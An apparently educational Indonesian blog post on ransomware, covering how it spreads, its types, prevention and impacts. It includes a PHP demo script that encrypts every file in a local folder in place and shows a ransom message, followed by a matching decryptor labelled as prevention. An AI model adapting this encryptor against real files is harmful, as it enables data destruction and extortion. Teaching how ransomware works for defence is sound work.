RANSOMWARE

pada tanggal

Pengertian Ransomware

Ransomware adalah jenis virus atau malware berbahaya yang digunakan untuk mengenkripsi data pengguna pada suatu perangkat komputer atau jaringan.

Aksi pencurian data ini umumnya bertujuan untuk memberikan keuntungan tertentu para pelaku di mana keuntungan tersebut berupa uang atau pembayaran lainnya.

Ransomware ini tentu menyebabkan kerugian cukup signifikan, baik secara finansial maupun pribadi. Selain itu, serangan ransomware juga dapat memengaruhi aktivitas individu dan operasional bisnis, seperti mengganggu sistem operasi dan layanan bisnis.

Biasanya, ransomware menyebar melalui email phishing, situs web yang terinfeksi, atau unduhan perangkat lunak yang terinfeksi.

Cara Kerja Ransomware

  1. Infeksi Awal: Ransomware biasanya masuk ke dalam sistem melalui email berbahaya, lampiran email, unduhan dari situs web yang tidak aman, atau melalui kerentanan keamanan perangkat lunak.
  2. Eksekusi: Setelah ransomware berhasil masuk ke sistem, ia akan menjalankan program yang mengenkripsi file dan data di komputer korban.
  3. Notifikasi Tebusan: Setelah data dienkripsi, ransomware akan menampilkan pesan yang memberitahukan korban bahwa data mereka telah dikunci dan hanya akan dibuka jika korban membayar sejumlah uang sebagai tebusan.
  4. Pembayaran Tebusan: Korban diinstruksikan untuk membayar tebusan, biasanya dalam bentuk mata uang kripto seperti Bitcoin, untuk mendapatkan kunci dekripsi.
  5. Dekripsi (Opsional): Setelah pembayaran dilakukan, pelaku ransomware mungkin memberikan kunci dekripsi kepada korban, meskipun tidak ada jaminan bahwa data akan benar-benar dipulihkan.

Jenis-Jenis Ransomware

  1. Crypto Ransomware: Mengenkripsi file dan data korban sehingga tidak dapat diakses tanpa kunci dekripsi.
  2. Locker Ransomware: Mengunci sistem korban sehingga mereka tidak dapat mengakses komputer atau perangkat mereka.
  3. Scareware: Menakut-nakuti pengguna dengan pesan palsu yang menyatakan bahwa ada masalah dengan komputer mereka dan meminta pembayaran untuk memperbaikinya.
  4. Doxware/Leakware: Mengancam akan mempublikasikan data sensitif korban kecuali tebusan dibayar.
  5. Ransomware-as-a-Service (RaaS): Model bisnis di mana pelaku kejahatan siber menjual atau menyewakan ransomware kepada pelaku lain yang tidak memiliki keterampilan teknis.

Cara Pencegahan Ransomware

  1. Pendidikan dan Kesadaran: Mengedukasi pengguna tentang email phishing, lampiran berbahaya, dan taktik sosial rekayasa yang umum digunakan oleh pelaku ransomware.
  2. Backup Data: Secara rutin melakukan backup data penting dan menyimpannya di lokasi yang terpisah atau di cloud.
  3. Pembaharuan Perangkat Lunak: Selalu memperbarui sistem operasi, perangkat lunak, dan antivirus untuk menutup kerentanan keamanan.
  4. Penggunaan Antivirus dan Anti-Malware: Menginstal dan memperbarui perangkat lunak antivirus dan anti-malware untuk mendeteksi dan menghapus ransomware sebelum menginfeksi sistem.
  5. Kontrol Akses: Menggunakan kontrol akses yang ketat dan prinsip "least privilege" untuk meminimalkan risiko infeksi ransomware.
  6. Segmentasi Jaringan: Memisahkan jaringan untuk membatasi penyebaran ransomware jika terjadi infeksi.
Demo :
  • Buat folder ransomware, di dalam folder tersebut buat lagi folder target_folder
  • Isikan target_folder beberapa file contoh yang akan di encrypt oleh ransomware
  • Buat file encrypt.php dan isikan kode berikut:

<?php
// Generate key
$key = base64_encode(openssl_random_pseudo_bytes(32));

// Simpan kunci ke file (untuk dekripsi nantinya)
file_put_contents('key.txt', $key);

// Fungsi untuk mengenkripsi file
function encryptFile($file, $key) {
    $data = file_get_contents($file);
    $method = 'aes-256-cbc';
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length($method));
    $encrypted = openssl_encrypt($data, $method, $key, 0, $iv);
    $encrypted .= '::' . base64_encode($iv);
    file_put_contents($file, $encrypted);
}

// Tentukan folder yang akan dienkripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        encryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah dienkripsi. Bayar tebusan untuk mendapatkan kunci dekripsi.";
?>

  • Jalankan serangan ransomware di browser dengan mengetikkan http://localhost/ransomware/encrypt.php 
  • Cek folder target_folder dan buka isi filenya, folder yang semula bisa terbuka, menjadi terkunci ketika mendapatkan ransomware
 

Pencegahan :
  • Buat file untuk decrypt serangan ransomware
  • Buat file decrypt.php dengan kode berikut untuk mendekripsi file yang terenkripsi:
<?php
// Load the key from the file
$key = file_get_contents('key.txt');

// Fungsi untuk mendekripsi file
function decryptFile($file, $key) {
    $data = file_get_contents($file);
    list($encrypted_data, $iv) = explode('::', $data, 2);
    $method = 'aes-256-cbc';
    $decrypted = openssl_decrypt($encrypted_data, $method, $key, 0, base64_decode($iv));
    file_put_contents($file, $decrypted);
}

// Tentukan folder yang akan didekripsi
$folder = './target_folder';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($folder));
foreach ($files as $file) {
    if ($file->isFile()) {
        decryptFile($file->getRealPath(), $key);
    }
}
echo "Semua file telah didekripsi.";
?>

Jalankan file tersebut dengan mengetikkan: http://localhost/ransomware/decrypt.php 

File tidak terkunci lagi walaupun serangan telah dilakukan.




Dampak Ransomware

  1. Kehilangan Data: Data penting dapat hilang atau tidak dapat diakses jika korban tidak membayar tebusan atau jika kunci dekripsi tidak diberikan.
  2. Biaya Finansial: Biaya tebusan bisa sangat mahal, dan belum tentu data dapat dikembalikan meskipun tebusan dibayar.
  3. Gangguan Operasional: Bisnis bisa mengalami gangguan operasional yang signifikan, mengakibatkan hilangnya produktivitas dan pendapatan.
  4. Kerugian Reputasi: Kepercayaan pelanggan dan reputasi bisnis bisa rusak jika data sensitif diretas atau bocor.
  5. Kerugian Hukum: Perusahaan bisa menghadapi konsekuensi hukum jika data pelanggan yang sensitif terungkap atau jika mereka gagal melindungi data dengan baik.

Dengan memahami ancaman yang ditimbulkan oleh ransomware dan mengambil langkah-langkah pencegahan yang tepat, individu dan organisasi dapat mengurangi risiko dan dampak yang mungkin ditimbulkan oleh serangan ransomware.

 


Komentar

Posting Komentar